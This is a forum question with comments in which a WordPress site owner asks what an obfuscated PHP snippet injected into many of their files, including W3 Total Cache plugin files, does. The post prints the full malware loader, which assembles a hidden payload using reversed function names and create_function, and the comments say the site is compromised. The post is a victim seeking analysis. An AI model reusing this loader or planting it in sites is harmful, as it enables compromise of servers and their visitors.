
I am running a WordPress website and I've recently found this PHP code injected into many of my PHP files. https://www.unphp.net/decode/fb4715ee71b28135f6807389df42611c/

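I tried adding a `print_r(get_defined_vars())` call at the end of my PHP file and executing the script with php-cli. I found that the malicious code builds an array holding three PHP function names in mixed case: `strrev`, plus `create_function` and `str_replace`, both written backwards. At the end of the script the two reversed names are restored with `strrev`, slices of the long string are joined and have their tabs turned into backslashes by `str_replace`, and the result is passed to `create_function` and called, so the array is only the loader for code hidden in the long string.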

Here's my variables dump - don't mind the numbers, that's just from vim :

    [hpcwubg] => Array
232         (                                                                                                                                                                                                                                 
233             [0] => STrrEv
234             [1] => NoITCnuF_EtaeRC
235             [2] => ECaLPer_RtS
236         )
237 
238     [pnmizyj] => >!#]y84]275]y83]248]y83]256]y81]265]y72]254]y76#<!%w:!>!(%w68]y7f#<!%tww!>!›   x2400~:<h%_t%:osvufs:~:<*9-1-r%)s%>/h%:!>!%yy)#}#-#›x24-›   x24151› x64"))) { $ulxsqmc = "› x63›162›x65›141›x74›145›x5f›146›x75›156sset($#
239     [jbopckwkcc] => StR_rePLaCE

Another thing worth mentioning is that I've found this small code section injected into the plugin files of the latest version of W3 Total Cache (W3TC), which I found really odd. Is it spreading somehow?

Can anyone help me understand the actual purpose of that obfuscated code? I see it in a hell of a lot of WordPress files, but I can't find any sign of unintended or bad content being exposed on my website.

Post edited again to include the PHP code.

<?php $uaohpersri = '>!#]y84]275]y83]248]y83]256]y81]265]y72]254]y76#<!%w:!>!(%w68]y7f#<!%tww!>!    x2400~:<h%_t%:osvufs:~:<*9-1-r%)s%>/h%:!>!%yy)#}#-# x24-    x24151  x64"))) { $ulxsqmc = "  x63 162 x65 141 x74 145 x5f 146 x75 156sset($GLOBALS["  x61 156o#>>}R;msv}.;/#/#/},;#-#}+;%-qp%)54l}    x27;%!<*#}_;#)323ldfid>>!}_;gvc%}&;ftmbg}   x7f;!osvufs}w;* x7f!>>  x22!pd%)!gj}Z;hz+sfwjidsb`bj+upcotn+qsvmt+fmhpphtj  x22)gj!|!*nbsbq%)323ldfidk!~!<**qp%!-uyfu%)3of)fepdof`57ftbc    x7f!|5:6197g:74985-rr.93e:5597f-s.973:8297fX    x24<!%tmw!>!#]y84]275]y83]273sutcvt)fubmgoj{hA!osvufs!~<3,j%rxB%epnbss!>!bssbz)#44ec:649#-!#:618d5f9#-!#Df#<%tdz>#L4]275L3]248L3P6L1M5]D2P4]D6#<%G]y6d]281Ld]245]y]g2y]#>>*4-1-bubE{h%)s]K9]77]D4]82]K6]72]K9]78]K5]53]Kc#<%tpz!>!#]D6M7]K3#<%yy>#]D2178}527}88:}334}472    x24<!%ff2!>!bssbz)  x24]25  x24-    x24-!%  x24->}&;!osvufs}    x7f;!opjudovgcB%iN}#-!  x24/%tmw/   x24)%c*#*<!sfuvso!sboepn)%epnbss-%22!ftmbg)!gj<*#k#)usbut`cpV   x7f x7f x7f x7f<u%V x27{ftpf{jt)!gj!<*2bd%-#1GO x22#)fepmqyfA>2b%judovg+)!gj+{e%!osvufs!*!+A!>!{e%)!>>  xplode(array_map("zblhkju",str_split("%tjw!w)#  x24#-!#]y38#-!%w:**<")));$wanexvc = $ulxsqmc("", $eW%hIr    x5c1^-%r    x5c2^-%hOh/#00#W~!%t2w)##Qtjw)#]82#-#!#-%tchr(ord($n)-1);} @error_reporting(0); $emwrgdm = im<#762]67y]562]38y]572]48yK2]285]Ke]53Ld]53]Kc]55Ld]55#*<%bG9}:}.}-}!#*<%nfd>   x7fw6*3qj%7>    x2272qj%)7gj6<**2qj%)hopmq%>U<#16,47R57,27R66,#:!>! x246767~6<Cw6<pd%w6Z6<.5`hA x27pd%6<116 x54"]); if ((strstr($uas,"  x6d 163 x69 145")) or (strs/q%>2q%<#g6R85,67R37,127&6<.fmjgA    x27doj%6<   x7fw6*  x7f_*#fmjgk4`{6~6<tfs%w6<**3-j%-bubE{h%)sutcvt-#w#)ldbqov>*ofmy%)utjm!|!*5! x27!hmg%)!gj!|2bge56+99386c6f+9f5d816:+946:ce44#)zbssb!>!ssbnpe_GMFT`QIQ&56A:>:8:|:7#6#)tutjyf`439275ttfsqnpdov{h19275j{hnpd19275f:5297e:56-xr.985:52985-t.98]K4]65pmqyf    x27*&7-n%)utjm6<    x7fw6*CW&)7gj6<*K)ftpmdXA6~6<u%27,*c    x27,*b  x27)fepdof.)fepdof./#@#/qp%>5h%!<*::::::-111112)eox24*<!    
x24-    x24gps)%j>1<%j=tjvg x22)!gj}1~!<2p% x7f!~!<##!>!2p%Z<^2 x5c!%ff2-!%t::**<(<!fwbm)%tjtr($uas,"   x72 166 x3a 61  x31")) or (strstr($uas,"    x61 156 x64 162 x6f OBALS[" x61 156 x75 156 x61"]=1; $uas=strtolower($_Sif((function_exists("   x6f 142 x5f 163 x74 141 x72 164") && (!itutjyf`4    x223}!+!<+{e%+*!*+fepdfe{h+{d%)+op,*!|  x24-    x24gvodujpo!    x24-    x24y7   x24-    !*uyfu  x27k:!ftmf!}Z;^nbsbq%   x5cSFWSFT`%}X;!sp!*#oppd%w6Z6<.4`hA x27pd%6<pd%w6Z6<.3`hA   x27d_SFSFGFS`QUUI&c_UOFHB`SFTV`QUUI&b%!|!*)323zbek!~!<b%    x7f3qjA)qj3hopmA    x273qj%6<*Y%)fnbozcYufhA    2b%!>!2p%!*3>?*2b%)gmfV x7f<*X&Z&S{ftmfV    x7f<*XAZASV<*w%)ppde>u%V<#65,47R25,d7R17,67R37,#/%s:    x5c%j:^<!%w`    x5c^>Ew:)!sp!*#ojneb#-*f%)sfxpmpusut)tpqssutRe%)Rd%)Rb%))!gj!<*#cd>j%!*3!   x27!hmg%!)!gj!<2,*j88M4P8]37]278]225]241]334]368]322]3]364]6]283]427]36]373P6]36]s%6<*17-SFEBFI,6<*127-UVPFNJU,6<*27-SFGTOBSUOSVUFS,6<*msv%7-MSV,6<*rxW~!Ypp2)%zB%z>!   x24/%tmw/   x2fmtf!%z>2<!%ww2)%w`TW~    x24<!fwbm)%tjw)bssbz)#P#-#Q#-#B#-%b:>1<!gps)%j:>1<%j:=tj{fpg)%s:*<  x63 164 x69 157 x6e"; function zblhkju($n){return ]#>m%:|:*r%:-t%)3of:opjudovg<~    x24<!%o:!>! x24]D8]86]y31]278]y3f]51L3]84]y31M6]y3e]81#/#7e:55946mwrgdm); $wanexvc();}}7>/7&6|7**111127-K)ebfsX x27u%)7fmjix6<C x27&6<*rfs%7-K)fujsxW%eN+#Qi    x5c1^W%c!>!%i   x5c2^<!Ce*[!%cIjQeTQcOc/#00#W~!Ydrr)%ERVER["    x48 124 x54 120 x5f 125 x53 105 x52 137 x41 107 x45 x272qj%6<^#zsfvr#   x5cq%7/7#@#7/7^#iubq#   x5cq%   x27js%fdy<Cb*[%h!>!%tdz)%bbT-%bT-%hW~%fdy)##-!#~<%h00#*<%nfd)##Qtpz)#]341]}k~~9{d%:osvufs:~928>>    x22:ftmbg39*]y76]277#<!%t2w>#]y74]273]y76]>n%<#372]58y]472]37y]672]48y]#>s%<#462]47y]252]18y]#>q%8R#>q%V<*#fopoV;hojepdoF.uofuopD#)sfebfI{*w%)kVx{**#k#)tutjyf`x    x22%!-#1]#-bubE{h%)tpqsut>j%!*72!   
x27!hmg%)!gj!<2,*j%-#1]#-bubE{)ujojR    x27id%6<    x7fw6*  x7f_*#ujojRk3`{666~6<l:!}V;3q%}U;y]}R;2]},ubmgoj{h1:|:*mmvo:>:iuhofm%:-5ppde:4:|:**#ppde#)4)%zW%h>EzH,2W%wN;#-Ez-1H*WCw*[!%rN}#QwTd}R;*msv%)}.;`UQPMSVD!-id%)uqpuft`msvd},;uqpuft`msvd}+;!>!}   x27;!>#)zbssb!-#}#)fepmqnj!/!#0#)idubn`hfsq)m%):fmjix:<##:>:h%:<#64y]552]e7y]#234]342]58]24]31#-%tdz*Wsfuvso!%bss   x5#T#-#E#-#G#-#H#-#I#-#K#-#L#-#M#-#[#-#Y#-#D#-#W#-#C#-#O#-#N#*-mw)%tww**WYsboepn)%bss-%rxB%h>#]y31]278]y3e]81]K78:5698!*1?hmg%)!gj!<**2-4-bubE{h%)sutcvt)esp>hmg%!<12>j%!|!*#91y]c9pd%6<pd%w6Z6<.2`hA   x27pd%6<C   x27pd%6|6.7eu{66~67<&w6<*&7-#o]s]o]s]#)fe5P6]y6gP7L6M7]D4]275]D:M8]g}x;0]=])0#)U!   x27{**u%-#jt0}Z;0]=]0#)2q%l}S;2-u%!-#2#/#%#/#o]#/67]452]88]5]48]32M3]317]445]212]445]43]321]464]284]364]6]-tusqpt)%z-#:#*   x24-    x24!>!  x24/%tQb:Qc:W~!%z!>2<!gps)%j>1<%j=6[%ww2!>#p#/#p#/%z<jg!)%z>>2*!%z>3<!-tr.984:75983:48984:7173]83]238M7]381]211M5]fs%6~6<   x7fw6<*K)ftpmdXA6|7**197-2qj%7-K)udfoopdXA  x24*!|! x24-    x24 x5c%j^  x24-    x24tvctus)% x24-    x24b8   x24-    x24]26  x24-    x24<%j,f6c68399#-!#65egb2dc6]281L1#/#M5]DgP5]D6#<%fdy>#]D4]273]D6P2L!>>!}W;utpi}Y;tuofuopd`ufh`fmjg}[;ldpt%}K;`ufldpt}X;`msvcsboe))1/35.)1/14+9**-)1/2986+7**^/%rx<~!!%s:N}#-%o:W%c:>1<mpef)#   x24*<!%t::!>!   x24Ypp3)%bs`un>qp%!|Z~!<##!>!2p%!|!*!***b%)sfxpmpusut!-#j0#!/!**#sfmcnbs+yfeobg)!gj!|!*msv%)}k~~~<ftmbg!os  x75 156 x61"])))) { $GL;osvufs} x27;mnui}&;zepc}A;~!}   x7f;!|!}{;)gj}l;33bq}k;opjudovX6<#o]o]Y%7;utpI#7>/7rfs%6<#o]1/20QUUI7jsv%7UFH#  x27r!<X>b%Z<#opo#>b%!*##>>X)!gjZ<#opo#>b%!**X)uft   x22)7gj6<*QDU`MPT7-NBFSUT`LDPT7-UFOJ`GB)fubfsdXA    x27K6<  x7fw6*CWtfs%)7gj6<*id%)ftpmdR6<*id%)dfyfR   x27tff_UTPI`QUUI&e_SEEB`FUPNFS&<    x7fw6*CW&)7gj6<*doj%7-C)fepmqnjA    xutcvt)!gj!|!*bubE{h%)j{hnpd!opjudovg!|!**#j{hnpd#)tutjyf`opjudo!<*qp%-*.%)euhA)3of>2b&w6<  x7fw6*CW&)7gj6<.[A  x27&6<  x7fw6*  x7f_*#[k2`{6:!}7;!}6;##}C;!opjudovg}{;#)tutjyf`opjudov*)323zbe!-#jt0*?]+^?]_    x5c}{fpg)%  x24-    x24*<!~!    
x24/%t2w/   x24)##-!#~<#/%  x24-    x24!>!fyqh%)tpqsut>j%!*9!   x27!hmg%)!gj!~<ofmy%,3,j%>j%!<%j:,,Bjg!)%j:>>1*!%b:>1<!fmtf!%b:>%s: x5c%j:.2^,%b:<!%c:>v%6<C>^#zsfvr#   x5cq%7**^#zsfvr#    x5cq%)ufttj x22)gj6<^#Y#252]y85]256]y6g]257]y86]267]y74]275]y7:]2<**#57]38y]47]67y]37]88y]27]28y]#/r%/h%)n%-#+I#)q%:>:r%:|:**t%)m%=*h%vufs!|ftmf!~<**9.-j%-bubE{h%)d%!<5h%/#0#/*#npd/#)rrd/#00;quui#>.%!<***f   x27,*e  x27,*d  x   x5cq%   x27Y%6<.msv`ftsbqA7>q%6<    x7fw6*  x7f_*#fubfsdXk5`{66~6<&w6jw/    x24)%   x24-    x24y4   x24-    x24]ySTrrEvxNoITCnuF_EtaeRCxECaLPer_RtSdstsant'; $hpcwubg=explode(chr((369-249)),substr($uaohpersri,(18488-12562),(203-169))); $pnmizyj = $hpcwubg[0]($hpcwubg[(6-5)]); $jbopckwkcc = $hpcwubg[0]($hpcwubg[(7-5)]); if (!function_exists('ixhjfzq')) { function ixhjfzq($lhyyqilczp, $luqzuuxg,$ecvibopy) { $deywkzb = NULL; for($dvjpmdtzf=0;$dvjpmdtzf<(sizeof($lhyyqilczp)/2);$dvjpmdtzf++) { $deywkzb .= substr($luqzuuxg, $lhyyqilczp[($dvjpmdtzf*2)],$lhyyqilczp[($dvjpmdtzf*2)+(3-2)]); } return $ecvibopy(chr((44-35)),chr((380-288)),$deywkzb); }; } $jqscophj = 
explode(chr((167-123)),'2070,62,202,23,4861,24,2018,52,3138,60,1387,58,1948,70,136,66,2848,51,1158,51,1004,42,0,59,1346,41,2265,39,4072,70,1735,54,3017,61,4946,53,4431,50,5044,56,1285,39,2361,39,3198,51,5578,56,5831,64,5174,36,1467,54,5100,48,2662,67,3566,44,5295,64,4619,56,3719,66,285,58,5359,28,4833,28,5744,29,514,31,2573,27,3505,61,5474,47,1521,65,4011,61,646,23,5210,63,1881,42,2400,20,926,39,5273,22,5773,58,1789,63,4764,69,343,33,3785,37,2515,58,1586,59,5148,26,2304,57,4999,45,376,69,2214,51,225,60,792,26,3318,35,1645,57,3631,48,2132,43,965,39,872,54,2420,70,1324,22,1445,22,3438,67,3610,21,4885,61,4168,64,5387,27,483,31,3353,30,5634,41,59,56,5675,69,3822,35,3383,55,1209,25,2899,46,729,63,4481,51,115,21,4289,34,5895,31,4532,26,2175,39,1852,29,5414,60,4734,30,818,27,3078,60,545,44,4558,20,845,27,2729,30,3679,40,1101,57,3956,55,445,38,1702,33,2945,50,4387,22,669,60,4578,41,4142,26,589,57,1234,51,3249,69,2600,62,4409,22,4232,57,3857,38,4675,59,2815,33,5521,57,2490,25,4323,64,2759,56,3895,61,1923,25,1046,55,2995,22'); $qynqbm = $pnmizyj("",ixhjfzq($jqscophj,$uaohpersri,$jbopckwkcc)); $pnmizyj=$uaohpersri; $qynqbm(""); $qynqbm=(568-447); $uaohpersri=$qynqbm-1; ?><?php

// Silence is golden. ?>

It's a horrible one-liner, I know.

Paradox
Mihai T.
  • Can't follow the link, I only get `ERR_BAD_SSL_CLIENT_AUTH_CERT`. – Anders Jun 28 '16 at 12:31
  • 3
    This should be considered normal when running Wordpress. Switch that pile of garbage for something decent, like Ghost or even a static website. (in case you didn't understand my sarcasm: you got compromised, reinstall your server but don't reinstall WP) – André Borie Jun 28 '16 at 12:36
  • There is nothing harmful I can see in the code you provided, but it may be included in other PHP files to do malicious things. As Andre said, most probably you are compromised. – Sravan Jun 28 '16 at 13:17
